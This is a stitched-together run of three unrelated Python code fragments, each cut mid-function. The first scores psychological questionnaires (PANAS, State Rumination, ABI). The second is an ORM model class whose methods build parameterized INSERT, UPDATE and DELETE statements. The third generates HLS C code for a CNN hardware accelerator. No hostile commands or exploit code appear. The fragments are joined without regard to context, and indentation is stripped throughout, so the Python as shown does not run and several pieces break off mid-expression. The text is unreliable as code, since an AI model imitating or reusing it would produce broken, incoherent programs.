data, subscales, {"NegativeAffect": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]}, score_range=score_range
)
panas_data[score_name + "_Total"] = data.mean(axis=1)
return pd.DataFrame(panas_data, index=data.index)
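# Illustrative usage sketch (not part of the original module). Column names are
# placeholders; the 20 items must already be scored in the [1, 5] range. The
# ``language`` switch only changes which item indices belong to the positive
# and negative affect subscales.
def _example_panas_usage():
    """Minimal sketch showing how ``panas`` might be called."""
    data = pd.DataFrame(
        np.random.randint(1, 6, size=(4, 20)),
        columns=["PANAS_{:02d}".format(i) for i in range(1, 21)],
    )
    english_scores = panas(data)                    # default (english) mapping
    german_scores = panas(data, language="german")  # german item mapping
    return english_scores, german_scores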
def state_rumination(data: pd.DataFrame, columns: Optional[Union[Sequence[str], pd.Index]] = None) -> pd.DataFrame:
"""Compute the **State Rumination** scale.
Rumination is the tendency to dwell on negative thoughts and emotions.
Higher scores indicate greater rumination.
.. note::
This implementation assumes a score range of [0, 4].
Use :func:`~biopsykit.questionnaires.utils.convert_scale()` to convert the items into the correct range
beforehand.
Parameters
----------
data : :class:`~pandas.DataFrame`
dataframe containing questionnaire data. Can either be only the relevant columns for computing this score or
a complete dataframe if ``columns`` parameter is supplied.
columns : list of str or :class:`pandas.Index`, optional
list with column names in correct order.
This can be used if columns in the dataframe are not in the correct order or if a complete dataframe is
passed as ``data``.
Returns
-------
:class:`~pandas.DataFrame`
State Rumination score
Raises
------
:exc:`~biopsykit.utils.exceptions.ValidationError`
if number of columns does not match
:exc:`~biopsykit.utils.exceptions.ValueRangeError`
if values are not within the required score range
References
----------
<NAME>., & <NAME>. (1998). The relationship between emotional rumination and cortisol secretion
under stress. *Personality and Individual Differences*, 24(4), 531-538.
"""
score_name = "StateRumination"
score_range = [0, 4]
# create copy of data
data = data.copy()
if columns is not None:
# if columns parameter is supplied: slice columns from dataframe
_assert_has_columns(data, [columns])
data = data.loc[:, columns]
_assert_num_columns(data, 27)
_assert_value_range(data, score_range)
# reverse scores 1, 6, 9, 12, 15, 17, 18, 20, 27
data = invert(data, cols=to_idx([1, 6, 9, 12, 15, 17, 18, 20, 27]), score_range=score_range)
return pd.DataFrame(data.sum(axis=1), columns=[score_name], index=data.index)
# HABIT DATASET
def abi(data: pd.DataFrame, columns: Optional[Union[Sequence[str], pd.Index]] = None) -> pd.DataFrame:
"""Compute the **Angstbewältigungsinventar (ABI)** (Anxiety Management Inventory).
The ABI measures two key personality constructs in the area of stress or anxiety management:
    *Vigilance (VIG)* and *Cognitive Avoidance (KOV)*. *VIG* is defined as a class of coping strategies whose
    use aims to reduce uncertainty in threatening situations.
In contrast, *KOV* refers to strategies aimed at shielding the organism from arousal-inducing stimuli.
Parameters
----------
data : :class:`~pandas.DataFrame`
dataframe containing questionnaire data. Can either be only the relevant columns for computing this score or
a complete dataframe if ``columns`` parameter is supplied.
columns : list of str or :class:`pandas.Index`, optional
list with column names in correct order.
This can be used if columns in the dataframe are not in the correct order or if a complete dataframe is
passed as ``data``.
Returns
-------
:class:`~pandas.DataFrame`
ABI score
Raises
------
:exc:`~biopsykit.utils.exceptions.ValidationError`
if number of columns does not match
:exc:`~biopsykit.utils.exceptions.ValueRangeError`
if values are not within the required score range
References
----------
<NAME>., <NAME>., <NAME>., Angstbewältigung, <NAME>., & VIG, V. (1999).
Das Angstbewältigungs-Inventar (ABI). *Frankfurt am Main*.
"""
score_name = "ABI"
score_range = [1, 2]
if columns is not None:
# if columns parameter is supplied: slice columns from dataframe
_assert_has_columns(data, [columns])
data = data.loc[:, columns]
_assert_num_columns(data, 80)
_assert_value_range(data, score_range)
# split into 8 subitems, consisting of 10 questions each
items = np.split(data, 8, axis=1)
abi_raw = pd.concat(items, keys=[str(i) for i in range(1, len(items) + 1)], axis=1)
idx_kov = {
# ABI-P
"2": [2, 3, 7, 8, 9],
"4": [1, 4, 5, 8, 10],
"6": [2, 3, 5, 6, 7],
"8": [2, 4, 6, 8, 10],
# ABI-E
"1": [2, 3, 6, | |
'_olo_is_breaked', False):
depth = self.__ctx__.instantiate_depth or 0
if not isinstance(_olo_is_new, bool):
_olo_is_new = depth <= 1
self._olo_is_new = _olo_is_new
self._olo_decrypt = _olo_decrypt and not self._olo_is_new
if self._olo_is_new:
self._check_attrs(attrs)
attrs = self._wash_attrs(attrs)
attrs = self._olo_append_default_attrs(attrs)
if self.__encrypted_fields__ and self._olo_decrypt:
attrs = decrypt_attrs(self.__class__, attrs)
self._init()
self._data = attrs
def _init(self):
self._parsed_data = {}
self._dirty_fields = set()
self._orig = None
def _clone(self):
return copy(self)
def _set_orig(self):
if self._olo_is_new:
return
self._orig = self._clone()
@override
def get_uuid(self):
raise NotImplementedError
def get_finally_uuid(self):
uuid = self.get_uuid()
return '{}/props'.format(uuid)
def __getstate__(self):
dct = dict(self.__dict__)
dct.pop('_dirty_fields', None)
dct.pop('_orig', None)
dct.pop('_parsed_data', None)
dct = dict(dct)
_data = dct.get('_data', {})
if _data:
dct['_data'] = dict(_data)
# Return tuple to distinguish the old version
return (dct,)
def __setstate__(self, state):
if isinstance(state, tuple):
self.__dict__.update(state[0])
else:
self._data = state # pragma: no cover
self._init()
@classmethod
def _olo_instantiate(cls, **attrs):
_olo_is_new = attrs.pop('_olo_is_new', False)
return cls._instantiate(_olo_is_new=_olo_is_new, **attrs)
@classmethod
def _instantiate(cls, **attrs):
return cls(**attrs)
@classmethod
def _check_choices(cls, attrs):
for field_name in cls.__choices_field_sets__:
v = attrs.get(field_name, missing)
if v is not missing:
getattr(cls, field_name).validate(v)
def _check_validates(self, attrs):
for field_name, validate in self.__validates__.iteritems():
v = attrs.get(field_name, missing)
if v is not missing:
validate(v)
self.olo_validate()
def _validate_attrs(self, attrs, parse=True, decrypt=True, output=True):
if parse:
parsed_attrs = self._parse_attrs(
attrs, decrypt=decrypt, output=output
)
else:
parsed_attrs = attrs
self._check_choices(parsed_attrs)
self._check_validates(parsed_attrs)
return parsed_attrs
def _clear_cache(self):
delete_cache(self)
def _rollback(self):
if self._orig:
self._data.update(self._orig._data)
self._init()
def is_dirty(self):
return bool(self._dirty_fields)
def save(self):
if self._olo_is_new:
return self._olo_insert()
if not self._dirty_fields:
return False
attrs = {key: getattr(self, key) for key in self._dirty_fields}
is_success = self.update(**attrs)
self._dirty_fields.clear()
return is_success
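    # Illustrative note (not part of the original class, hypothetical ``User``
    # model): ``save()`` dispatches on object state. A freshly instantiated
    # model (``_olo_is_new``) is INSERTed via ``_olo_insert()``, while an
    # existing model only UPDATEs the attributes collected in
    # ``_dirty_fields``, e.g.:
    #   user = User.create(name='a')   # INSERT
    #   user.name = 'b'                # attribute assignment marks 'name' dirty
    #   user.save()                    # issues UPDATE ... SET name = 'b'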
def update(self, **attrs):
self._check_attrs(attrs)
attrs = self._wash_attrs(attrs)
if not attrs:
return False
if self._orig is None:
self._set_orig()
if self.before_update(**attrs) is False:
self._rollback()
return False
db = self._get_db()
need_updates = {}
for k, v in self.__on_updates__.iteritems():
if k in attrs:
continue
try:
res = v()
except TypeError:
res = v(self)
need_updates[k] = res
attrs = dict(need_updates, **attrs)
expressions, sql_attrs, db_attrs = self._split_attrs(attrs)
sql_attrs = self._validate_attrs(sql_attrs, decrypt=False)
db_attrs = self._validate_attrs(db_attrs, decrypt=False)
clean_attrs = dict(sql_attrs, **db_attrs)
for k in db_attrs:
# cache old db values
getattr(self._orig, k, None)
next_inst = self._clone()
next_inst.__setstate__(dict(self._data, **clean_attrs))
can_update = self._orig._will_update(
next_inst,
fields=clean_attrs.keys(),
)
if can_update is False:
self._rollback()
return False
if expressions:
expression, _params = self.unique_expression_and_params
if not _params:
                raise ExpressionError('Cannot update this instance because ' # noqa pragma: no cover
                                      'the model has neither a primary_key '
                                      'nor a unique_key')
sql_pieces, params = get_sql_pieces_and_params(expressions)
if _params:
params.extend(_params)
sql = (
'UPDATE `{table_name}` SET {columns} '
'WHERE {expression} '
).format(
table_name=self._get_table_name(),
columns=', '.join(sql_pieces),
expression=expression
)
try:
db.execute(sql, params)
if db.autocommit:
db.commit()
except Exception:
if db.autocommit:
db.rollback() # pragma: no cover
raise
dynamic_exps = [
exp for exp in expressions if isinstance(exp.right, Expression)
]
if dynamic_exps:
keys = map(lambda x: x.left.attr_name, dynamic_exps)
q = self.__class__.query(*keys).filter(**{
attr_name: getattr(self, attr_name)
for attr_name in self.__primary_key__
})
values = q.first()
if not isinstance(values, tuple):
values = [values]
_attrs = dict(izip(keys, values))
sql_attrs.update(self._parse_attrs(_attrs))
before_update.send(self)
clean_attrs = dict(sql_attrs, **db_attrs)
self._data.update(clean_attrs)
for k in clean_attrs:
self._parsed_data.pop(k, None)
for k, v in db_attrs.iteritems():
field = getattr(self.__class__, k)
field.db_set(self, v)
_orig = self._orig
def func():
db.commit_beansdb()
after_update.send(self)
self.after_update()
if _orig is not None:
self._orig = None
self._did_update(
_orig,
fields=chain.from_iterable([
sql_attrs.iterkeys(),
db_attrs.iterkeys(),
])
)
def rollback_handler():
self._rollback()
if db.autocommit:
func()
else:
db.add_lazy_func(func)
db.add_rollback_handler(rollback_handler)
return True
def delete(self, **kwargs):
if self.before_delete(**kwargs) is False:
return
expression, params = self.unique_expression_and_params
if not params:
            raise ExpressionError('Cannot delete this instance because ' # noqa pragma: no cover
                                  'the model has neither a primary_key '
                                  'nor a unique_key')
sql = (
'DELETE FROM `{table_name}` '
'WHERE {expression} '
).format(
table_name=self._get_table_name(),
expression=expression
)
db = self._get_db()
db.execute(sql, params)
def func():
after_delete.send(self)
self.after_delete(**kwargs)
if db.autocommit:
db.commit()
func()
else:
db.add_lazy_func(func)
return True
@override
def to_json(self):
return self.to_dict(jsonize=True)
@override
def to_dict(self, excludes=None, parsers=None,
type_parsers=None, jsonize=False):
excludes = excludes or []
parsers = parsers or {}
if type_parsers is None:
type_parsers = {}
if jsonize:
type_parsers.update({
datetime: _datetime_parser,
date: _date_parser,
})
res = {}
for k in chain(self.__all_fields__, self.__exported_property_names__):
if k in excludes:
continue
v = getattr(self, k)
if isinstance(v, Field):
continue # pragma: no cover
parser = parsers.get(k, _default_parser)
parser = type_parsers.get(type(v), parser)
res[k] = parser(v)
return res
@classmethod
def _olo_get_field(cls, attr_name):
if attr_name not in cls.__fields__:
return
return getattr(cls, attr_name)
@classmethod
def _olo_get_db_field(cls, attr_name):
if attr_name not in cls.__db_fields__:
return
return getattr(cls, attr_name)
@classmethod
def _split_attrs(cls, attrs, collect_expression=True):
expressions = []
sql_attrs = {}
db_attrs = {}
for k, v in attrs.iteritems():
if k in cls.__db_fields__:
db_attrs[k] = v
elif k in cls.__fields__:
if not isinstance(v, Expression):
sql_attrs[k] = v
if collect_expression:
f = getattr(cls, k)
v = cls._deparse_attrs({k: v})[k]
expressions.append(BinaryExpression(f, v, '='))
return expressions, sql_attrs, db_attrs
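# Illustrative sketch (field names assumed): given
#   attrs = {'name': 'foo', 'counter': <Expression>, 'cached_blob': b'...'}
# where `cached_blob` is declared in __db_fields__, this returns
#   expressions -> [name = %s, counter = <expr>]   (BinaryExpression objects)
#   sql_attrs   -> {'name': 'foo'}                 (plain SQL column values)
#   db_attrs    -> {'cached_blob': b'...'}         (values handled outside SQL
#                                                   and committed via commit_beansdb)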
@classmethod
def _check_attrs(cls, attrs):
key = '_olo_dir_cache'
cls_attrs = cls.__dict__.get(key)
if cls_attrs is None:
cls_attrs = set(dir(cls))
setattr(cls, key, cls_attrs)
invalid_attrs = set(attrs) - cls_attrs
if invalid_attrs:
raise InvalidFieldError(
'Cannot find the attributes from {}: {}'.format(
cls.__name__,
', '.join(invalid_attrs)
)
)
@classmethod
def _wash_attrs(cls, attrs):
return {
k: v
for k, v in attrs.iteritems()
if v is not missing
}
@classmethod
def _map_attrs(cls, attrs):
return { # pragma: no cover
getattr(cls, k).name: v
for k, v in attrs.iteritems()
}
@classmethod
def create(cls, **attrs):
inst = cls._olo_instantiate(
_olo_is_new=True, **attrs
)
if inst._olo_insert():
return inst
def _olo_insert(self):
if not self._olo_is_new:
return False # pragma: no cover
before_create_is_instance_method = getattr(self.before_create, '__self__', None) is self # noqa pylint: disable=C
if before_create_is_instance_method:
bcr = self.before_create()
attrs = dict(self._data)
_, sql_attrs, db_attrs = self._split_attrs(attrs)
if not before_create_is_instance_method:
bcr = self.before_create(**attrs) # pragma: no cover
if bcr is False:
return False
self._validate_attrs(attrs, parse=True,
decrypt=self._olo_decrypt)
db = self._get_db()
expressions, _, _ = self._split_attrs(sql_attrs)
if expressions:
sql_pieces = []
params = []
for exp in expressions:
piece, _ = sql_and_params(exp.left)
_, _params = sql_and_params(exp)
sql_pieces.append(piece)
if _params:
params.extend(_params)
sql = (
'INSERT INTO `{table_name}`({columns}) '
'VALUES({values}) '
).format(
table_name=self._get_table_name(),
columns=', '.join(sql_pieces),
values=', '.join(['%s'] * len(params))
)
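# Hypothetical example of the generated statement (table/columns assumed):
#   INSERT INTO `user`(`name`, `age`) VALUES(%s, %s)
# with params == ['foo', 18]; db.execute() is expected to return the new
# auto-increment id, which is backfilled as the primary key below.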
try:
id_ = db.execute(sql, params)
if db.autocommit:
db.commit()
except Exception:
if db.autocommit:
db.rollback() # pragma: no cover
raise
pk_name = self.get_singleness_pk_name()
if (
hasattr(self.__class__, pk_name) and
pk_name in self.__class__.__fields__ and
pk_name not in self._data
):
self._data[pk_name] = id_
# need thinking
self._extend_missing_data()
for k, v in db_attrs.iteritems():
field = getattr(self.__class__, k)
field.db_set(self, v)
self._olo_is_new = False
def rollback_handler():
self._olo_is_new = True
def func():
db.commit_beansdb()
after_insert.send(self)
if getattr(self.after_create, '__self__', None) is self:
self.after_create()
else:
self.after_create(self) # pragma: no cover pylint: disable=E
if db.autocommit:
func()
else:
db.add_lazy_func(func)
db.add_rollback_handler(rollback_handler)
return True
@classmethod
def get_singleness_pk_attr_name(cls):
pk = cls.__primary_key__
pkl = len(pk)
if pkl != 1:
raise ExpressionError(
'This method only supports a singleness primary key for now. '
'But your primary key has {} keys'.format(pkl)
)
return list(pk)[0]
@classmethod
def get_singleness_pk_field(cls):
attr_name = cls.get_singleness_pk_attr_name()
return getattr(cls, attr_name)
@classmethod
def get_singleness_pk_name(cls, default='id'):
try:
field = cls.get_singleness_pk_field()
except ExpressionError:
return default
return field.name
def _get_singleness_pk_value(self):
field = self.get_singleness_pk_field()
return getattr(self, field.attr_name)
def _olo_get_pk_value(self):
pk = self.__primary_key__
return tuple(getattr(self, attr_name) for attr_name in pk)
def _olo_get_signature(self):
pk_value = self._olo_get_pk_value()
return (self.__table_name__,) + pk_value
def _extend_missing_data(self):
missing_fields = [
getattr(self.__class__, k) for k in self.__fields__
if k not in self._data
]
if not missing_fields:
return # pragma: no cover
pk_dict = self._get_pk_dict()
if not pk_dict:
raise Exception('No pk dict!!!') # pragma: no cover
values = self.__class__.query(*missing_fields).filter(
**pk_dict
).first()
if len(missing_fields) == 1 and values is not None and not isinstance(values, list):
values = [values]
if values:
self._data.update(
dict(izip(map(lambda f: f.attr_name, missing_fields), values))
)
def _get_pk_dict(self):
dct = {}
for attr_name in self.__primary_key__:
v = getattr(self, attr_name, missing)
if v is not missing:
dct[attr_name] = v
return dct
@classmethod
def _get(cls, id=None, **kwargs):
if not kwargs:
pk_name = cls.get_singleness_pk_name()
return cls._get_by(**{pk_name: id})
return cls._get_by(**kwargs)
@classmethod
def get(cls, id=None, **kwargs):
opt = cls._options
if opt.cache_client and opt.auto_use_cache:
return cls.cache.get(id=id, **kwargs)
return cls._get(id=id, **kwargs)
@classmethod
def _get_multi(cls, idents, filter_none=True):
if not idents:
return []
if not type_checker([dict], idents):
pk_name = cls.get_singleness_pk_name()
pk_field = getattr(cls, pk_name)
items = cls._get_multi_by(pk_field.in_(idents))
mapping = {str(getattr(item, pk_name)): item for item in items}
else:
ident = idents[0]
| |
code.append(indent(2) + 'initial_round++;\n')
code.append(indent(2) + 'LAYER_OUT_NUM_T_prev = LAYER_OUT_NUM_T;\n')
code.append(indent(2) + 'LAYER_IN_IMG_H_T_prev = LAYER_IN_IMG_H_T;\n')
code.append(indent(2) + 'LAYER_IN_IMG_W_T_prev = LAYER_IN_IMG_W_T;\n')
code.append(indent(2) + 'LAYER_COL_IL_FACTOR_prev = LAYER_COL_IL_FACTOR;\n')
code.append(indent(2) + 'LAYER_STRIDE_prev = LAYER_STRIDE;\n\n')
indent_level = 2
code.append(indent(indent_level) + 'task_iter += 1;\n')
code.append(indent(indent_level) + 'if (task_iter == LAYER_TASK_NUM2){\n')
code.append(indent(indent_level + 1) + 'task_iter = 0;\n')
code.append(indent(indent_level + 1) + 'layer_iter += 1;\n')
code.append(indent(indent_level + 1) + 'layer_start = 1;\n')
code.append(indent(indent_level + 1) + 'if (layer_iter == LAYER_BATCH){\n')
code.append(indent(indent_level + 2) + 'layer_iter = 0;\n')
code.append(indent(indent_level + 2) + 'done = 1;\n')
code.append(indent(indent_level + 1) + '}\n')
code.append(indent(indent_level) + '}\n')
# code.append(indent(indent_level) + 'out_h_iter += %sOUT_IMG_H_T;\n' % (var_prefix))
# code.append(indent(indent_level) + 'if (out_h_iter >= LAYER_OUT_IMG_H){\n')
# code.append(indent(indent_level + 1) + 'out_h_iter = 0;\n')
# code.append(indent(indent_level + 1) + 'out_w_iter += %sOUT_IMG_W_T;\n' % (var_prefix))
# code.append(indent(indent_level + 1) + 'if (out_w_iter >= LAYER_OUT_IMG_W){\n')
# code.append(indent(indent_level + 2) + 'out_w_iter = 0;\n')
# code.append(indent(indent_level + 2) + 'out_num_iter += LAYER_OUT_NUM_T;\n')
# code.append(indent(indent_level + 2) + 'if (out_num_iter >= LAYER_OUT_NUM){\n')
# code.append(indent(indent_level + 3) + 'out_num_iter = 0;\n')
# code.append(indent(indent_level + 3) + 'layer_iter += 1;\n')
# code.append(indent(indent_level + 3) + 'layer_start = 1;\n')
# code.append(indent(indent_level + 3) + 'if (layer_iter == LAYER_BATCH){\n')
# code.append(indent(indent_level + 4) + 'layer_iter = 0;\n')
# code.append(indent(indent_level + 4) + 'done = 1;\n')
# code.append(indent(indent_level + 3) + '}\n')
# code.append(indent(indent_level + 2) + '}\n')
# code.append(indent(indent_level + 1) + '}\n')
# code.append(indent(indent_level) + '}\n')
code.append(indent(1) + '}\n\n')
code.append(indent(1) + 'if (initial_round % 2 == 1){\n')
code.append(indent(2) + var_prefix + 'Data' + str(idx) + 'WriteDataLast(ping_buffer, fifo_transfer_out, engine_id, LAYER_OUT_NUM_T_prev, LAYER_IN_IMG_H_T_prev, LAYER_IN_IMG_W_T_prev, LAYER_COL_IL_FACTOR_prev, LAYER_STRIDE_prev);\n')
code.append(indent(1) + '} else {\n')
code.append(indent(2) + var_prefix + 'Data' + str(idx) + 'WriteDataLast(pong_buffer, fifo_transfer_out, engine_id, LAYER_OUT_NUM_T_prev, LAYER_IN_IMG_H_T_prev, LAYER_IN_IMG_W_T_prev, LAYER_COL_IL_FACTOR_prev, LAYER_STRIDE_prev);\n')
code.append(indent(1) + '}\n')
code.append('}\n\n')
idx += 1
return code
def loader(desp, config):
code = []
var_prefix = 'U%s' %(desp['KERNEL_ID']) + '_'
idx = 0
for op_name in desp['OP_NAME']:
if desp['APP_NAME'] == 'cnn':
# TODO: temporary solution
# shim
if idx == 0:
code.append('void ' + var_prefix + 'DataFeed' + str(idx) + 'Head_Shim(\n')
code.append(indent(1) + var_prefix + 'bus_t' + str(idx) + '* ' + op_name + ',\n')
code.append(indent(1) + 'stream<ap_uint<' + var_prefix + 'DATA' + str(idx) + '_WIDTH * ' + var_prefix + 'DATA' + str(idx) + '_FC_SIMD_FACTOR> > &fifo_transfer_' + op_name + ',\n')
code.append(indent(1) + 'uint LAYER_IN_NUM,\n')
code.append(indent(1) + 'uint LAYER_OUT_NUM,\n')
code.append(indent(1) + 'uint LAYER_IN_NUM_T,\n')
code.append(indent(1) + 'uint LAYER_OUT_NUM_T,\n')
code.append(indent(1) + 'uint LAYER_IN_IMG_H,\n')
code.append(indent(1) + 'uint LAYER_IN_IMG_W,\n')
code.append(indent(1) + 'uint LAYER_OUT_IMG_H,\n')
code.append(indent(1) + 'uint LAYER_OUT_IMG_W,\n')
code.append(indent(1) + 'uint LAYER_IN_IMG_H_T,\n')
code.append(indent(1) + 'uint LAYER_IN_IMG_W_T,\n')
code.append(indent(1) + 'uint LAYER_FILTER_S,\n')
code.append(indent(1) + 'uint LAYER_STRIDE,\n')
code.append(indent(1) + 'uint LAYER_BATCH,\n')
code.append(indent(1) + 'stream<%sConfigInst> &fifo_kernel_config_out\n' % (var_prefix))
code.append('){\n')
code.append('#pragma HLS INLINE off\n\n')
code.append(indent(1) + 'uint LAYER_TASK_NUM1 = (LAYER_IN_NUM / LAYER_IN_NUM_T) * (LAYER_OUT_NUM / LAYER_OUT_NUM_T) * (LAYER_OUT_IMG_H / LAYER_IN_IMG_H_T * LAYER_STRIDE) * (LAYER_OUT_IMG_W / LAYER_IN_IMG_W_T * LAYER_STRIDE);\n')
code.append(indent(1) + 'uint LAYER_TASK_NUM2 = (LAYER_OUT_NUM / LAYER_OUT_NUM_T) * (LAYER_OUT_IMG_H / LAYER_IN_IMG_H_T * LAYER_STRIDE) * (LAYER_OUT_IMG_W / LAYER_IN_IMG_W_T * LAYER_STRIDE);\n')
code.append(indent(1) + 'uint LAYER_LOCAL_ACCUM_NUM = LAYER_IN_NUM_T / %sSIMD_FACTOR * LAYER_FILTER_S * LAYER_FILTER_S;\n' %(var_prefix))
code.append(indent(1) + 'uint LAYER_LOCAL_REG_NUM = (LAYER_IN_IMG_H_T / LAYER_STRIDE) * (LAYER_IN_IMG_W_T / %sSA_COLS / LAYER_STRIDE) * LAYER_OUT_NUM_T / %sSA_ROWS;\n' % (var_prefix, var_prefix))
code.append(indent(1) + 'uint LAYER_ROW_IL_FACTOR = LAYER_OUT_NUM_T / %sSA_ROWS;\n' % (var_prefix))
code.append(indent(1) + 'uint LAYER_COL_IL_FACTOR = LAYER_IN_IMG_W_T / %sSA_COLS / LAYER_STRIDE;\n\n' % (var_prefix))
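# Reading aid for the generated config above (a comment in the generator, not
# part of the emitted HLS code): LAYER_TASK_NUM1/2 count tile-level tasks over
# (input-channel x) output-channel x spatial output tiles, LAYER_LOCAL_ACCUM_NUM
# is the number of SIMD accumulation steps per output element, and the ROW/COL
# interleaving factors spread one tile across the SA_ROWS x SA_COLS systolic array.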
code.append(indent(1) + 'ap_uint<32> CIN_OFFSET = 0;\n')
code.append(indent(1) + 'ap_uint<32> WEIGHT_OFFSET = 0;\n')
code.append(indent(1) + 'ap_uint<32> BIAS_OFFSET = 0;\n')
code.append(indent(1) + 'ap_uint<32> COUT_OFFSET = 0;\n')
code.append(indent(1) + 'ap_uint<16> FILTER_S1 = LAYER_FILTER_S;\n')
code.append(indent(1) + 'ap_uint<16> FILTER_S2 = LAYER_FILTER_S;\n')
code.append(indent(1) + 'ap_uint<32> STRIDE = LAYER_STRIDE;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_EN = 0;\n')
# code.append(indent(1) + 'ap_uint<32> LAYER_BATCH = LAYER_BATCH;\n\n')
code.append(indent(1) + 'ap_uint<32> LAYER_IN_NUM_cast = LAYER_IN_NUM;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_OUT_NUM_cast = LAYER_OUT_NUM;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_IN_NUM_T_cast = LAYER_IN_NUM_T;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_OUT_NUM_T_cast = LAYER_OUT_NUM_T;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_IN_IMG_H_T_cast = LAYER_IN_IMG_H_T;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_IN_IMG_W_T_cast = LAYER_IN_IMG_W_T;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_IN_IMG_H_cast = LAYER_IN_IMG_H;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_IN_IMG_W_cast = LAYER_IN_IMG_W;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_OUT_IMG_H_cast = LAYER_OUT_IMG_H;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_OUT_IMG_W_cast = LAYER_OUT_IMG_W;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_BATCH_cast = LAYER_BATCH;\n\n')
code.append(indent(1) + 'ap_uint<32> LAYER_TASK_NUM1_cast = LAYER_TASK_NUM1;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_TASK_NUM2_cast = LAYER_TASK_NUM2;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_LOCAL_ACCUM_NUM_cast = LAYER_LOCAL_ACCUM_NUM;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_LOCAL_REG_NUM_cast = LAYER_LOCAL_REG_NUM;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_ROW_IL_FACTOR_cast = LAYER_ROW_IL_FACTOR;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_COL_IL_FACTOR_cast = LAYER_COL_IL_FACTOR;\n\n')
code.append(indent(1) + var_prefix + 'bus_t%d %s_buf[%sDATA%d_HEAD_BUF_SIZE / %sDATA%d_PACK_FACTOR];\n' % (idx, op_name, var_prefix, idx, var_prefix, idx))
code.append(indent(1) + 'ap_uint<' + var_prefix + 'DATA' + str(idx) + '_WIDTH * ' + var_prefix + 'DATA' + str(idx) + '_FC_SIMD_FACTOR> sel_tmp[' + var_prefix + 'DATA' + str(idx) + '_PACK_FACTOR / ' + var_prefix + 'DATA' + str(idx) + '_FC_SIMD_FACTOR];\n')
code.append('#pragma HLS ARRAY_PARTITION variable=sel_tmp complete dim=1\n\n')
w = cal_width(desp['PARAMETERS']['LAYER_BATCH'])
code.append(indent(1) + 'for (ap_uint<%d> layer_iter = 0; layer_iter < LAYER_BATCH; layer_iter++){\n' % (w))
code.append(indent(2) + '%sConfigInst inst0 = (LAYER_OUT_IMG_W_cast, LAYER_OUT_IMG_H_cast, LAYER_IN_IMG_W_cast, LAYER_IN_IMG_H_cast, LAYER_OUT_NUM_cast, LAYER_IN_NUM_cast);\n' % (var_prefix))
code.append(indent(2) + '%sConfigInst inst1 = (LAYER_OUT_IMG_W_cast, LAYER_OUT_IMG_H_cast, LAYER_IN_IMG_W_cast, LAYER_IN_IMG_H_cast, LAYER_OUT_NUM_cast, LAYER_IN_NUM_cast);\n' % (var_prefix))
code.append(indent(2) + '%sConfigInst inst2 = (STRIDE, FILTER_S2, FILTER_S1, COUT_OFFSET, BIAS_OFFSET, WEIGHT_OFFSET, CIN_OFFSET);\n' % (var_prefix))
code.append(indent(2) + '%sConfigInst inst3 = (LAYER_BATCH_cast, LAYER_IN_IMG_W_T_cast, LAYER_IN_IMG_H_T_cast, LAYER_OUT_NUM_T_cast, LAYER_IN_NUM_T_cast, LAYER_EN);\n' % (var_prefix))
code.append(indent(2) + '%sConfigInst inst4 = (LAYER_COL_IL_FACTOR_cast, LAYER_ROW_IL_FACTOR_cast, LAYER_LOCAL_REG_NUM_cast, LAYER_LOCAL_ACCUM_NUM_cast, LAYER_TASK_NUM2_cast, LAYER_TASK_NUM1_cast);\n\n' % (var_prefix))
code.append(indent(2) + 'fifo_kernel_config_out.write(inst0);\n')
code.append(indent(2) + 'fifo_kernel_config_out.write(inst1);\n')
code.append(indent(2) + 'fifo_kernel_config_out.write(inst2);\n')
code.append(indent(2) + 'fifo_kernel_config_out.write(inst3);\n')
code.append(indent(2) + 'fifo_kernel_config_out.write(inst4);\n\n')
code.append(indent(2) + 'for (int out_img_h_t = 0; out_img_h_t < LAYER_OUT_IMG_H; out_img_h_t += LAYER_IN_IMG_H_T / LAYER_STRIDE){\n')
code.append(indent(3) + 'for (int out_img_w_t = 0; out_img_w_t < LAYER_OUT_IMG_W; out_img_w_t += LAYER_IN_IMG_W_T / LAYER_STRIDE){\n')
code.append(indent(4) + 'for (int out_num_t = 0; out_num_t < LAYER_OUT_NUM; out_num_t += LAYER_OUT_NUM_T){\n')
code.append(indent(5) + 'uint chunk_offset = out_img_h_t * LAYER_IN_IMG_W * LAYER_IN_NUM;\n')
code.append(indent(5) + 'for (int in_img_h_t = 0; in_img_h_t < LAYER_IN_IMG_H_T + LAYER_FILTER_S - 1; in_img_h_t++){\n')
code.append(indent(6) + 'uint local_chunk_offset = chunk_offset + in_img_h_t * LAYER_IN_IMG_W * LAYER_IN_NUM + out_img_w_t * LAYER_IN_NUM;\n')
code.append(indent(6) + 'memcpy((void*)(cin_buf + in_img_h_t * (LAYER_IN_IMG_W_T + LAYER_FILTER_S - 1) * LAYER_IN_NUM / %sDATA%d_PACK_FACTOR), (void*)(cin + local_chunk_offset / %sDATA%d_PACK_FACTOR), sizeof(%sdata_t%d) * (LAYER_IN_IMG_W_T + LAYER_FILTER_S - 1) * LAYER_IN_NUM);\n' % (var_prefix, idx, var_prefix, idx, var_prefix, idx))
code.append(indent(5) + '}\n')
code.append(indent(5) + 'for (int in_num_t = 0; in_num_t < LAYER_IN_NUM; in_num_t += LAYER_IN_NUM_T){\n')
code.append(indent(6) + 'for (int ii = 0; ii < LAYER_IN_NUM_T / %sDATA%d_FC_SIMD_FACTOR; ii++){\n' % (var_prefix, idx))
code.append(indent(7) + 'for (int hh = 0; hh < LAYER_IN_IMG_H_T + LAYER_FILTER_S - 1; hh++){\n')
code.append(indent(8) + 'for (int ww = 0; ww < LAYER_IN_IMG_W_T + LAYER_FILTER_S - 1; ww++){\n')
code.append('#pragma HLS PIPELINE II=1\n')
code.append(indent(9) + 'uint cin_local_idx = hh * (LAYER_IN_IMG_W_T + LAYER_FILTER_S - 1) * LAYER_IN_NUM + ww * LAYER_IN_NUM + (in_num_t + ii * %sDATA0_FC_SIMD_FACTOR);\n' % (var_prefix))
